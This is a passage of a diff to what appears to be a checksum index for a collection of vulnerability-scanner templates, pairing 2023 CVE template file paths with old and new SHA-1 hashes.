-http/cves/2023/CVE-2023-20889.yaml:5bfb70330fa3b04f5b0af636c18a2c6a5267ac4b +http/cves/2023/CVE-2023-2059.yaml:295dbb72c980c4dc2c21032d20abe3bea8d9591a +http/cves/2023/CVE-2023-20864.yaml:2658f5f3e5e81def4c87f09ac7bb4794ee36380f +http/cves/2023/CVE-2023-20887.yaml:de34b8535e1e90d53cbc3485e08255b59eaea21b +http/cves/2023/CVE-2023-20888.yaml:e505418300ed1d09b3640e82667c2e24b93f00df +http/cves/2023/CVE-2023-20889.yaml:ccd943207b89b26addc9b511fc4169bc5ef47283 http/cves/2023/CVE-2023-2122.yaml:7dca84047ac5d644ee1d20ea67b70e4bd36947ed http/cves/2023/CVE-2023-2130.yaml:314de8c387b9e0bd75dd8a98f0c7283185b83db9 http/cves/2023/CVE-2023-2178.yaml:3907c43ef047c7398dd6c6075b7eb37f81431e7f -http/cves/2023/CVE-2023-22232.yaml:2ba9592c818ffec5b515fe7b5daa05c39e5c0075 +http/cves/2023/CVE-2023-22232.yaml:7f8bb8c9e80d5cd56e74c3e3f8f340de27d5adf6 http/cves/2023/CVE-2023-2224.yaml:e0d9099e5025c8aa7b3e29c3aa6ba735e4be50f2 -http/cves/2023/CVE-2023-2227.yaml:419bd91b84cd26b87741523630753ff62a0f6f56 +http/cves/2023/CVE-2023-2227.yaml:5f5d2fb74bdf79f618c1ffbcc388552d0a630cc8 http/cves/2023/CVE-2023-22432.yaml:9dbb7e336e8db33be5b66a8eabc22e1b165014b3 -http/cves/2023/CVE-2023-22463.yaml:2d955943e22db088cf96527a0829132e5772b7ca -http/cves/2023/CVE-2023-22478.yaml:60828118fe9d7a7642c22b6ec8e8823c3142587a -http/cves/2023/CVE-2023-22480.yaml:2aa43dfc6c7beaeafaee0862b0c4e72d5f868e92 -http/cves/2023/CVE-2023-22515.yaml:001d637ac8df397f671aefa6c8f939f3d5410c64 -http/cves/2023/CVE-2023-22518.yaml:578d6d85b9a2c589620c071d13415f4dd95195e6 -http/cves/2023/CVE-2023-2252.yaml:540bf478302df8c091ec14e8403a46ac8f8d0933 -http/cves/2023/CVE-2023-22527.yaml:3a3e37278c23e88e83755249211c24b057478d53 -http/cves/2023/CVE-2023-22620.yaml:9a4fb268f6aad7753f3a0d3a2222b5946221ed79 +http/cves/2023/CVE-2023-22463.yaml:a3d977237ef6f8850342a6f3c60aba4a5b3a8f4d +http/cves/2023/CVE-2023-22478.yaml:884234d1677be5e49581980e5c44a6005dfc1a3c +http/cves/2023/CVE-2023-22480.yaml:127f233495311a1d651f000f0c9e5ac4032264b4 +http/cves/2023/CVE-2023-22515.yaml:f54b3ac53cf7b5b47ac460018b6f7e1ee0c6badb +http/cves/2023/CVE-2023-22518.yaml:db77490e60bc45bbcd971a93a24ebe27742aeff6 +http/cves/2023/CVE-2023-2252.yaml:8218e5866dbbc4f8ab4c792eb29410c1b6928863 +http/cves/2023/CVE-2023-22527.yaml:5a398da4d8c11f0e15366f5357269a8e316edc26 +http/cves/2023/CVE-2023-22620.yaml:75e9d1795037ad70c56c152a05b3b3634e5a286b http/cves/2023/CVE-2023-2272.yaml:94a125ff04e62b2d1bda69787e8fd1019a36be42 -http/cves/2023/CVE-2023-22897.yaml:c46463ab516bb1faf879b0d29483e13138d356fd -http/cves/2023/CVE-2023-23161.yaml:edb754d19bcded64d5d054c11b355f252081d087 -http/cves/2023/CVE-2023-23333.yaml:f04c8f6519d52c53935243fb10dc6cddde95a27b +http/cves/2023/CVE-2023-22897.yaml:a91c5c5c3be9a49f1571201a4aef01240b9771e8 +http/cves/2023/CVE-2023-23161.yaml:f0b2596b264e2bcc39e434df1d06f4ab8564e0dc +http/cves/2023/CVE-2023-23333.yaml:e74f3de0180bef51e8247423cfa9aac212144725 http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 http/cves/2023/CVE-2023-23489.yaml:eb3988e79364bf65b6116f6040271a11ba06908d http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 -http/cves/2023/CVE-2023-2356.yaml:e48691aae0f032a6a3b25b934d0d1334e88b687a -http/cves/2023/CVE-2023-23752.yaml:c3505ebba983ea2f6c82bf34c77267ce5f8d396f -http/cves/2023/CVE-2023-24044.yaml:f85c5c11a2671b5285303f12ee1e9eb85ada8f3e -http/cves/2023/CVE-2023-24243.yaml:4e42089c2b7118d593f336cea101baec62433654 +http/cves/2023/CVE-2023-2356.yaml:afbda4cc50dc61ac647a8b192446559d0b64087b +http/cves/2023/CVE-2023-23752.yaml:3b34f72b378146dbbb96a2d9ac766100355d0e32 +http/cves/2023/CVE-2023-24044.yaml:4422aee8910f6d13a0e2d1d94437ccb4cbfa23b2 +http/cves/2023/CVE-2023-24243.yaml:2e7e657f95156e38a36b316ab03afe3a4662d6c1 http/cves/2023/CVE-2023-24278.yaml:1d2306f9d9cb2d17f8e79ee9cac52005c5a55cfe -http/cves/2023/CVE-2023-24322.yaml:1f16814c9e0527336a70b07183df6a08843dd52b +http/cves/2023/CVE-2023-24322.yaml:9565b6858c8be34bb34edf9a2ad5fd13826766ff http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 -http/cves/2023/CVE-2023-24488.yaml:314904a4ec11935f014941947359b122da566ba5 -http/cves/2023/CVE-2023-24489.yaml:9301d3ee69b9c3a2b964f0d0c5e59f8fbb341678 -http/cves/2023/CVE-2023-24657.yaml:e039ba8bc471c388352e4a488cadd3681029db7b -http/cves/2023/CVE-2023-24733.yaml:23bda09c6f044b03faec0b6649a1a853990ea0e0 -http/cves/2023/CVE-2023-24735.yaml:67120a500ee09b1505bd4e03931cf3442c6ee5c5 -http/cves/2023/CVE-2023-24737.yaml:a8ed9b45432009c15cef619e5191b47792268153 +http/cves/2023/CVE-2023-24488.yaml:910495eaa096525401a07f98899c7557d5d09e36 +http/cves/2023/CVE-2023-24489.yaml:d40ac2877d356166d00d3e518a0a3c8f17eba3bd +http/cves/2023/CVE-2023-24657.yaml:9f514c026f5476d711fa7038de6e6378fd564c97 +http/cves/2023/CVE-2023-24733.yaml:e3b747a31efa6f500696d63865160fc8fc31a5c9 +http/cves/2023/CVE-2023-24735.yaml:4c793e2fe7b5ad9b4abdb8e73e9b76bf051c7880 +http/cves/2023/CVE-2023-24737.yaml:f59b7ecdd1b0b4c17566980a6df3d0fa909a6800 http/cves/2023/CVE-2023-2479.yaml:de7d8970759dbc5947842d9f907336885284dc0c -http/cves/2023/CVE-2023-25135.yaml:96794dcb67daf207130181cfe351c88119a48ed4 -http/cves/2023/CVE-2023-25157.yaml:b523eac47864cd034b4340fb12634285ed72e585 -http/cves/2023/CVE-2023-25194.yaml:5b45568dd93d4f8fc9e80c356b3021284f450d11 +http/cves/2023/CVE-2023-25135.yaml:1ab9fd45f7f1d736b69c7ffdc3370e08f15903ab +http/cves/2023/CVE-2023-25157.yaml:ca9e024f095cd830912cd4adfedc9def802bbcd2 +http/cves/2023/CVE-2023-25194.yaml:7ec562c687c04ffacd04b7afa70791930013df1b http/cves/2023/CVE-2023-25346.yaml:51f024896301035a2c43b2e6e0213631707ed2b6 -http/cves/2023/CVE-2023-25573.yaml:6a121ccc820d7252353568d1ef36e765ea3c35dd -http/cves/2023/CVE-2023-25717.yaml:f3fba62004036acce7eed03adcb3184c64fb17a0 -http/cves/2023/CVE-2023-26035.yaml:4eafd9eb80c5e90c1545e15199cb95e41f451289 -http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 -http/cves/2023/CVE-2023-26255.yaml:ec1d253f10a1b1cb5c8681faf961c83f18e04fc5 -http/cves/2023/CVE-2023-26256.yaml:0ce70d95fae80f6cf144859b5627018a98de7aea -http/cves/2023/CVE-2023-26347.yaml:25df9074e22d8c47311a3458a5f447013045f5aa -http/cves/2023/CVE-2023-26360.yaml:82ffcb37b302392863d25e7cdbd5b9fda0503347 +http/cves/2023/CVE-2023-25573.yaml:9a546d29b2d4c155f3b557a301120c225bb0c342 +http/cves/2023/CVE-2023-25717.yaml:4f54cbfe8cc755924fbfb68614743708d5525c01 +http/cves/2023/CVE-2023-26035.yaml:ae2db8a7df2f18ef0e50762b2029456d916f22ae +http/cves/2023/CVE-2023-26067.yaml:4d1cfab6aa1f90f85042323bfa46bb334c5351f5 +http/cves/2023/CVE-2023-26255.yaml:c6fbc0183cd7910b015e51480fd7e708c52d924d +http/cves/2023/CVE-2023-26256.yaml:47475176f0cdb924b10403b22ca8082bea0e49bb +http/cves/2023/CVE-2023-26347.yaml:30c9fe77bbb6f6c62b6cc906d35b784e75e90898 +http/cves/2023/CVE-2023-26360.yaml:f67e80636fe985042dbacf1693a58bb0299e3455 http/cves/2023/CVE-2023-26469.yaml:d86410be29d5d94487f257b6b8928f6a2414b893 -http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 +http/cves/2023/CVE-2023-2648.yaml:fd2091f7748de8934ec2797c74c9befbb210e126 http/cves/2023/CVE-2023-26842.yaml:9ba42ef7713a2da2a394f4d7eb4a128b86fac335 http/cves/2023/CVE-2023-26843.yaml:8fe63e31bbec18e14832dc356cc39ad9fa68aac6 -http/cves/2023/CVE-2023-27008.yaml:30ef0a8f111c80fd8db02f0bd82d93b872258169 -http/cves/2023/CVE-2023-27032.yaml:ad4086ad222791bee07f60ac80d0cb7a95fa504f +http/cves/2023/CVE-2023-27008.yaml:1afa339f38fafd7edca1f5b38b518a71bd8e1fca +http/cves/2023/CVE-2023-27032.yaml:8e7567e27f469ff1f189a86084e14cdaf3138d44 http/cves/2023/CVE-2023-27034.yaml:81fe9d019fa4529576ca3e6ce5723d93c9a08b44 -http/cves/2023/CVE-2023-27159.yaml:cbef92bc5ef61d86ddd8f5621ef37267e63b0cef +http/cves/2023/CVE-2023-27159.yaml:5e99bfa993b51624cf7f3cf312f2ae46f4f4ccbc http/cves/2023/CVE-2023-27179.yaml:ad65cc149fce2fce2602528559e5ce2648f309e9 -http/cves/2023/CVE-2023-27292.yaml:6ec20f4f6de264927313e98584e617126f0af04e -http/cves/2023/CVE-2023-2732.yaml:fa07bf101983336938853b632588f27b19fd22fc -http/cves/2023/CVE-2023-27350.yaml:c81bd993344a9d4601e3a997478858aa9b90fb3b -http/cves/2023/CVE-2023-27372.yaml:842025a8909ee08c65b883599ff19fc202f55233 -http/cves/2023/CVE-2023-27482.yaml:7630dbd6eb208bea08f6417892458c367bcac0f5 -http/cves/2023/CVE-2023-27524.yaml:3070cfdf10ce5df9513d0f746742cb87ae2d1d40 +http/cves/2023/CVE-2023-27292.yaml:01cfbfff3615c3217b23d0f0fa441e3d30b1ce69 +http/cves/2023/CVE-2023-2732.yaml:b317d1e348b3f1fbebfe190683edccb5fc40d144 +http/cves/2023/CVE-2023-27350.yaml:40d80f8bd6f9e7236e3e09edb7a216ddf8de0a45 +http/cves/2023/CVE-2023-27372.yaml:b42ee971a27826c802ac49df5a67f34b6207c925 +http/cves/2023/CVE-2023-27482.yaml:ebb63a159ae1f48b1110c55ea419a7323289c670 +http/cves/2023/CVE-2023-27524.yaml:ff8bf52fbb718a7f0f899d13b4699fe964de5d4a http/cves/2023/CVE-2023-27587.yaml:fbcf3d35ecfe4f4d8d5bf1bf1ca6a3139fc006f6 http/cves/2023/CVE-2023-27639.yaml:96c7fb109c3d31579f51e9d141b8558edf581a37 http/cves/2023/CVE-2023-27640.yaml:afb078a9eea67cd4dc96bbbf79568ed1a9e4535c -http/cves/2023/CVE-2023-2766.yaml:0e16a02cb26f88cc75133220c5e34875d59d7ffe +http/cves/2023/CVE-2023-2766.yaml:03f64dae62d768adf920de10d16dd723f54423d5 http/cves/2023/CVE-2023-2779.yaml:8f901cbf94797358ec2e4eae2c6cfdf8955af305 -http/cves/2023/CVE-2023-2780.yaml:a2cee3c0e42a81ca03aa1b0ec5082df2067272b3 +http/cves/2023/CVE-2023-2780.yaml:1a64dc4ea8e06338d55fd7dba2eeabb9112f9c79 http/cves/2023/CVE-2023-27922.yaml:f1c1540bd8ccf6e832690facd76287109c579359 -http/cves/2023/CVE-2023-2796.yaml:17667149011e110a2fa5d5fc3e9e2d39bdfcea48 +http/cves/2023/CVE-2023-2796.yaml:0bcdc19d6458a258c5b5deccc49339c3dbf05977 http/cves/2023/CVE-2023-28121.yaml:1e68ea14d35be9823d0510222f17fe122654dbdd http/cves/2023/CVE-2023-2813.yaml:62914ae5b1294dfee142150ca6062f968462b2c1 -http/cves/2023/CVE-2023-2822.yaml:b6681985725c0221470756f2d04c12f77ee25de3 -http/cves/2023/CVE-2023-2825.yaml:b2964899db62c9f40b40947912a0795943cf05aa -http/cves/2023/CVE-2023-28343.yaml:f6b3e79cd5356bbfea7682166aa1973c646da41f -http/cves/2023/CVE-2023-28432.yaml:a27d97870b4406d6ba909a486d44c6e64c3f0a58 -http/cves/2023/CVE-2023-28662.yaml:ede071ef753338896b37459153402ba8506c07e4 +http/cves/2023/CVE-2023-2822.yaml:c481c92f6bea32eb6c0474c4ffa5a718707f6000 +http/cves/2023/CVE-2023-2825.yaml:b702cd6f298c7796185e5fd16f4ced74058f32f7 +http/cves/2023/CVE-2023-28343.yaml:4d59ebf268f1fb54c1477ef63a304ee54f042b3a +http/cves/2023/CVE-2023-28432.yaml:3e9e2ad4603086df6f79959ee2572db613ec7400 +http/cves/2023/CVE-2023-28662.yaml:01509b7a219ce2a89c841c7e25de8660d0523fb6 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a -http/cves/2023/CVE-2023-29298.yaml:5711b6d64ec8dd61006c8e55f251728f6902ea89 -http/cves/2023/CVE-2023-29300.yaml:5d50df74f1d9133bea7b8e454c08bf4713bebd85 -http/cves/2023/CVE-2023-29357.yaml:bb3bf18aebdf86e3eb3c4f4b4a73b8f72399b9a5 +http/cves/2023/CVE-2023-29298.yaml:0d8c3e1b11256211afa0f55cc2e1ac78ca964e2a +http/cves/2023/CVE-2023-29300.yaml:8106e12ee50960d5c091a797231abb678a43da33 +http/cves/2023/CVE-2023-29357.yaml:81423aef6740daa580d36ccc1d75f67150447d74 http/cves/2023/CVE-2023-29439.yaml:6b4d13d29a6d82c006a51c21b21e1a5b65a5355c -http/cves/2023/CVE-2023-2948.yaml:b78688316f38eb82d4343e3641d329f0bd0a5ff5 -http/cves/2023/CVE-2023-29489.yaml:a3a239ba6d4d74673b81b7a951de6dc982bb3721 -http/cves/2023/CVE-2023-2949.yaml:25a623db04b150b47d29371873eb5621cc0bdbbb +http/cves/2023/CVE-2023-2948.yaml:a87d9899c2e83a651c7e72bbc24189edbdad1dee +http/cves/2023/CVE-2023-29489.yaml:e4c789babd6b97c69b427a5faa511bb10c04cdc6 +http/cves/2023/CVE-2023-2949.yaml:6cff7a4b409c4b4276e16c55363fbe2b4a44b651 http/cves/2023/CVE-2023-29622.yaml:e073cdd1cecc1c12f4c15d92cd4b254f931b8717 http/cves/2023/CVE-2023-29623.yaml:45672ad306c134cd72076467059d7986e9967728 http/cves/2023/CVE-2023-2982.yaml:94f463ab73d722e5b527f6d3a9300e93167a364c -http/cves/2023/CVE-2023-29827.yaml:4fdb213a989c56e6f0dd28862c3ed57ff0035f9c +http/cves/2023/CVE-2023-29827.yaml:e42d979979986a9067745947d2d70d977c78f6ec http/cves/2023/CVE-2023-29887.yaml:e57348bffc401dde8d1d8fdfef061d1adac97095 -http/cves/2023/CVE-2023-29919.yaml:11278a84c8aa54248ecf6a3c4df2e639624bbf93 -http/cves/2023/CVE-2023-29922.yaml:e6271c500f962ae0ae3af22aa0530be92384b5b0 -http/cves/2023/CVE-2023-29923.yaml:e7b5b1aa20e939b446fa7d52db0ac03a41959f8b +http/cves/2023/CVE-2023-29919.yaml:0b70235fb4eb213125ad3199044a4a74cdb79a5d +http/cves/2023/CVE-2023-29922.yaml:63c166c7203b9d85a78a01e818c41bcfc594e264 +http/cves/2023/CVE-2023-29923.yaml:ec0ee9f3b83c63d0f2992ad8cf78388d3b7cef78 http/cves/2023/CVE-2023-30013.yaml:a7e4c7bc35c13f4d515cd586604b091640fe0594 -http/cves/2023/CVE-2023-30019.yaml:07babbf47ba1a9a51561999b1e3a7d5e921826cd -http/cves/2023/CVE-2023-30150.yaml:0146ca4ab131ef0c9b930273f8dc166dd751ccc6 +http/cves/2023/CVE-2023-30019.yaml:84e2dc2f76b1b01af25de0a200012771e84719da +http/cves/2023/CVE-2023-30150.yaml:43ba16e6462e92dbd5cbbe87fd05a916a9471791 http/cves/2023/CVE-2023-30210.yaml:5813ad5f81384f32da9b1376920592d190809922 http/cves/2023/CVE-2023-30212.yaml:e78558d9584338de17429906728f353dca4265ac http/cves/2023/CVE-2023-30256.yaml:21511c5e34cd98222ff485ca650f32c54ea3464d http/cves/2023/CVE-2023-30258.yaml:23dba33b4278040835f2427ff06c4cab132b3625 -http/cves/2023/CVE-2023-30534.yaml:9e3c7409ced61a7d1cf072990ca73bc728ab5ae3 +http/cves/2023/CVE-2023-30534.yaml:b8366d03a08910ff684ee21057971613ca639183 http/cves/2023/CVE-2023-30625.yaml:5cdf3a74958ba59dc965b31f8d53010dd466ab95 -http/cves/2023/CVE-2023-3077.yaml:367e6c800adc9e7a6c92611c8afa39321feba633 +http/cves/2023/CVE-2023-3077.yaml:6bce7caa88a87f9c028881a6c2b363b0e35e6033 http/cves/2023/CVE-2023-30777.yaml:2ec94a35275ee1271b6d0162b11c66c4325d8c33 http/cves/2023/CVE-2023-30868.yaml:7be43ec76fe6720e2d580becb0a56a9dc9064584 -http/cves/2023/CVE-2023-30943.yaml:c0a84c92afc5a463fc61c6f49cbc2306afa588f2 -http/cves/2023/CVE-2023-31059.yaml:fc3b7caa3f935dd0a6c22a0eedab3f5d8b4efb94 -http/cves/2023/CVE-2023-31446.yaml:d66aee208b3ad48b06662d345a778e0d90d4a243 +http/cves/2023/CVE-2023-30943.yaml:693ebbefbb87853945cf05a78bc7ea2c0266995f +http/cves/2023/CVE-2023-31059.yaml:0c1b2b2f49e65ea3cbdcffcf64101af66b4112c0 +http/cves/2023/CVE-2023-31446.yaml:ebcd37a2816b4e0f0563848e91470795cd128bca http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019 http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d -http/cves/2023/CVE-2023-32077.yaml:192b2e98d47431591fdc129945ac8c09a9c80ce0 +http/cves/2023/CVE-2023-32077.yaml:bb6e60dd80a7c447b3a928845e2da538ae5aa08f http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b -http/cves/2023/CVE-2023-3219.yaml:a3584e7e7600e84c3026faded846c127adebee8f -http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 +http/cves/2023/CVE-2023-3219.yaml:341ec2eb90f8e20dfc82fc4b9777cd0030203c24 +http/cves/2023/CVE-2023-32235.yaml:a2c673aa312cb965d8a2c54adb909d45ea68a6ae http/cves/2023/CVE-2023-32243.yaml:12f4b4530ce4e76db0f256859ab890a9146307a2 -http/cves/2023/CVE-2023-32315.yaml:990bab828ef146320b4c5cba1cb4323f4e30eb93 +http/cves/2023/CVE-2023-32315.yaml:290e3b9bded90f77d9353041ba08d1616c1a4c60 http/cves/2023/CVE-2023-32563.yaml:44cd044910d9126b3895a2b9b810c7244c6b3899 http/cves/2023/CVE-2023-33338.yaml:1fb9344bc45d0ca490046cd0c948e5d1cf7974c9 http/cves/2023/CVE-2023-33405.yaml:128e1bcd0957fd5f4f048951ed46ca5ffe253a17 @@ -3054,276 +3054,276 @@ http/cves/2023/CVE-2023-3345.yaml:aabe8c491d1bea611b75c123b469b4c968571fa9 http/cves/2023/CVE-2023-33510.yaml:6db13769fa328f1cf80d6f5fb6adcdc9b8f1f53a http/cves/2023/CVE-2023-33568.yaml:785724178bb0f9cbb97d985c085d3d038efa75e9 http/cves/2023/CVE-2023-33584.yaml:77d714a7b592d8ba4975902502a902e91567dd97 -http/cves/2023/CVE-2023-33629.yaml:3e2d86b9ca6281c3769bd285ca5c56de8badddd2 -http/cves/2023/CVE-2023-3368.yaml:1abf608433be5f74fb0b41192480f6e1dbea06c0 -http/cves/2023/CVE-2023-33831.yaml:d80149df9e07bfcf710151dc4f396dade4486200 +http/cves/2023/CVE-2023-33629.yaml:5307e5ffcf6f60f74365f76845414fc230e65e06 +http/cves/2023/CVE-2023-3368.yaml:e6a3271d3e7d7d88f9bfc9e6783e2462c42720b8 +http/cves/2023/CVE-2023-33831.yaml:36ea29ae8fadc2b9d98a2a8ca25dce2643129a32 http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e -http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a +http/cves/2023/CVE-2023-34192.yaml:107b59c3d3114f3bbeba99376c0ba323ace09c74 http/cves/2023/CVE-2023-34259.yaml:29e00e6317898a17f5c645a1badf181d0b0644f9 http/cves/2023/CVE-2023-34362.yaml:d477a1c3b81d3f95ec32840f9220c43d5de0ca13 -http/cves/2023/CVE-2023-34537.yaml:f522eb1205c0fe3269161294c6c0e40ecd314aaa -http/cves/2023/CVE-2023-34598.yaml:2ea20180baeee33c4308f3aaf378551c82a62ab8 -http/cves/2023/CVE-2023-34599.yaml:daf4f9803ce89168da4bf5a2e5cd3d89a1fd0d30 +http/cves/2023/CVE-2023-34537.yaml:d476a69f826746cf1b020256469c34bd08b7b2ff +http/cves/2023/CVE-2023-34598.yaml:3d226a8e23d34e79c5d6d03db5b5c454b6cec29e +http/cves/2023/CVE-2023-34599.yaml:e455956e14f07f6991ed9c2439e8e92bbd602fc7 http/cves/2023/CVE-2023-3460.yaml:2ba192fea89458954299c6b16ad3558abc8cc29a http/cves/2023/CVE-2023-34659.yaml:a165041e2b2c2e808d2ad5e955340a29696b62cb -http/cves/2023/CVE-2023-34751.yaml:b99e81a177638904a2fefdcae424fa1613025bd8 -http/cves/2023/CVE-2023-34752.yaml:b851b0fecf5b4d45b0cc9995a3f2c734e2a0793c -http/cves/2023/CVE-2023-34753.yaml:a342d1fc933c16d3abdaae9e1bba40a4ba88930a -http/cves/2023/CVE-2023-34755.yaml:a05a1c3f0534f47832a6ef45fe018222f7e17c3b -http/cves/2023/CVE-2023-34756.yaml:94f3f6d9c6559c556cf3729c19fbe074e41278ff -http/cves/2023/CVE-2023-3479.yaml:f564c46965bb1588b0fcafb3502da2beae0025bc -http/cves/2023/CVE-2023-34843.yaml:8ea29c8040509849e34300a31fd476737346e523 -http/cves/2023/CVE-2023-34960.yaml:2381f80be16cbf186c85b3b4db809e1d41a14499 -http/cves/2023/CVE-2023-34993.yaml:a3b0085c4446e25e6ef80234261084ccffc71e4b -http/cves/2023/CVE-2023-35078.yaml:eb4b036b8f80137073704a8349d2343da6c69d3e -http/cves/2023/CVE-2023-35082.yaml:1960a0ae8e9d496db2e08cb10e25229895f9f284 -http/cves/2023/CVE-2023-35158.yaml:a4744cff56bc5b12153d1cc54b959bb290742e7f -http/cves/2023/CVE-2023-35162.yaml:a1e9b6a500700fdc9ad4c23522c022e8ab9e0228 -http/cves/2023/CVE-2023-35813.yaml:aa0e5860ccecad4632ec6526f0f6b2732f91e4e8 +http/cves/2023/CVE-2023-34751.yaml:771e6e2070ff90e345dc5347ac0dddfbd8d6127a +http/cves/2023/CVE-2023-34752.yaml:190a8c6b96e168d948b386c4cdab5e3059bbb8ff +http/cves/2023/CVE-2023-34753.yaml:93a73c917c60477016e6f248c4fd1a8642e70652 +http/cves/2023/CVE-2023-34755.yaml:f626d9064a3ae1ca3892d789a7c735a18d37c5a2 +http/cves/2023/CVE-2023-34756.yaml:82ebb563518c790f78d002dc611aa2058a26bb8d +http/cves/2023/CVE-2023-3479.yaml:afd42ba78d32587d4ab6372f9dad24ccda8746fa +http/cves/2023/CVE-2023-34843.yaml:65ea119c92f7411ba92801aa9b0dd5261ebf3827 +http/cves/2023/CVE-2023-34960.yaml:29d7f7058e868d72f8ce75c13d5b8b9196ff87fd +http/cves/2023/CVE-2023-34993.yaml:7faee4b95781596bd863f070f874ab096d09a810 +http/cves/2023/CVE-2023-35078.yaml:10ea41d33d4822f6fbc45d42b22dbf409032dfe3 +http/cves/2023/CVE-2023-35082.yaml:007dba2dd1296ea62724eb9a360fb510f589f605 +http/cves/2023/CVE-2023-35158.yaml:ab30d159f23b2ff3d989648944df251723c797d1 +http/cves/2023/CVE-2023-35162.yaml:afec600a829e803d9338c1aa19c972f16fad3fcd +http/cves/2023/CVE-2023-35813.yaml:9496ccf96c40cd3d58e7b7c573afeec35b932cb8 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 -http/cves/2023/CVE-2023-35844.yaml:3afe70bf8e3e05945e34c3f9b5b65fec8286f1f6 -http/cves/2023/CVE-2023-35885.yaml:56e1d36ae12f90e2749cd6c9ca1290ba2cf97c65 -http/cves/2023/CVE-2023-36144.yaml:166e404d9c3c59723801f07c33cc8ba78d03e70e -http/cves/2023/CVE-2023-36284.yaml:d40dcff483b8d8ea5d59b2489179bc65b3f8e3d7 +http/cves/2023/CVE-2023-35844.yaml:272deae9e942a45cb59cb92eba084a11609bcb54 +http/cves/2023/CVE-2023-35885.yaml:cbc8ce10dd3689589cd4cf87144661e3e07d0a26 +http/cves/2023/CVE-2023-36144.yaml:212833d9ee78812611c3051797c0c6cd7e2b320e +http/cves/2023/CVE-2023-36284.yaml:36df643eb319f4999c8a7e450f4eb0e642d71aca http/cves/2023/CVE-2023-36287.yaml:7f3341d0aa2cfaf19f8b259f6d6e9b3667aef2b5 http/cves/2023/CVE-2023-36289.yaml:4626b6dbf62ee313dfa3e667ad3f6e8ea8cb1c01 http/cves/2023/CVE-2023-36306.yaml:674f574793a5920dcb55fff45751621aad280b71 http/cves/2023/CVE-2023-36346.yaml:d18a4a45752c1d26dae308c33515cdc9ff7536b3 -http/cves/2023/CVE-2023-36347.yaml:a73937d7aa71cd24f8c6995212d453f3b01c31e7 +http/cves/2023/CVE-2023-36347.yaml:38c958192e62fb572acc05c1bf7a539648a7b39b http/cves/2023/CVE-2023-36844.yaml:2f342d055540f1bb5d66ce79e0732a807922a919 -http/cves/2023/CVE-2023-36845.yaml:089f0e70780755db463b1bc19f8b879313529e4f +http/cves/2023/CVE-2023-36845.yaml:dd17d8edfbb7086c841fa29ec85ad711a00d4f96 http/cves/2023/CVE-2023-36934.yaml:00fd5e39f91d83c208f7389a8af2c81cfdbd3e28 http/cves/2023/CVE-2023-3710.yaml:21a07e78c7d194842b8698d5f1a63e599f6a5250 -http/cves/2023/CVE-2023-37265.yaml:5bdc99de362a32457ea2d47e6016e9f029500d51 -http/cves/2023/CVE-2023-37266.yaml:d70774086f0005182bd3aca28114770a90bca39b -http/cves/2023/CVE-2023-37270.yaml:e019ce8cf6428c84bcc3fed7018844b1fe5f6978 -http/cves/2023/CVE-2023-37462.yaml:0b7dcbd2f1508fa93bdf119bf9e48160abf3dc3c +http/cves/2023/CVE-2023-37265.yaml:75152f0de5ea21c18bddb988a599fb0bd2af3098 +http/cves/2023/CVE-2023-37266.yaml:0cb18e812cda302d7b407a21595c40f81801afcf +http/cves/2023/CVE-2023-37270.yaml:be5e33cb570a415bb06023d9a3364b4e15bbfb78 +http/cves/2023/CVE-2023-37462.yaml:d18231ebb4f26962733dc33f60b7d8fafa939a80 http/cves/2023/CVE-2023-37474.yaml:a6565d9a008a046e497384b2e3c54f2665ab21ce -http/cves/2023/CVE-2023-37580.yaml:813cb73932395c78efbf0269ebcfb600bb3fa716 +http/cves/2023/CVE-2023-37580.yaml:70546873118d99565fd3a80de7f37494f23b8d63 http/cves/2023/CVE-2023-37629.yaml:6b9aba73f2319467150cfdfb282cfb95d271174b -http/cves/2023/CVE-2023-3765.yaml:d0b4f1dddc5ea97c723cc2133db4270ff725875e -http/cves/2023/CVE-2023-37679.yaml:29efbfd3a0100150e0968b3c3eaf06ac5e9cc1cf -http/cves/2023/CVE-2023-37728.yaml:ac81f7c70eb71e4be0b34803997d2eba6a64167b +http/cves/2023/CVE-2023-3765.yaml:398deccf2838195156e67661734ad15466b068ce +http/cves/2023/CVE-2023-37679.yaml:44568429ee3e5c4de89120aaeeb8189bedf942b6 +http/cves/2023/CVE-2023-37728.yaml:b02bc1edba14ba4fa1f6c09a7e756a392f4e87c7 http/cves/2023/CVE-2023-37979.yaml:3542eab145a3bbe02375368006db5afcbb8c76ca -http/cves/2023/CVE-2023-38035.yaml:e7b134bab0c3250aa7674c8a90cfaf4c2a5dd75b -http/cves/2023/CVE-2023-38203.yaml:c59d035901d7b673fda7c46633013784828c95c0 -http/cves/2023/CVE-2023-38205.yaml:dde3c7e1a96a0780715e447411138049c1c4f23d -http/cves/2023/CVE-2023-3836.yaml:3189f131c74d753b3f456ca5ac3faf0c2f3e0e80 +http/cves/2023/CVE-2023-38035.yaml:07e2c8f4934f0e81810188eb7838aa97beb5e1d3 +http/cves/2023/CVE-2023-38203.yaml:baaa26d2525ea4decf0173c398b041abaa079acc +http/cves/2023/CVE-2023-38205.yaml:c8aca2dcad231983d2f466e7c5193dee8ad6e9b3 +http/cves/2023/CVE-2023-3836.yaml:78cf2110f420c249091f69341cc66e289a6f51d0 